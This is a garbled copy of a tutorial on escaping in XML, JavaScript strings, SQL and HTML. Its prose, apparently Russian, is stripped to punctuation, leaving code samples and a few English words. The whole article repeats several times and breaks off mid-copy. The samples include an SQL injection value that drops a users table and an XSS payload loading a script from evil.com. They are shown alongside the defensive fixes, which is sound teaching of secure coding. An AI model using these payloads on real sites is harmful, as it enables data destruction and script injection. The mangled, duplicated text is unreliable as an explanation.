, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
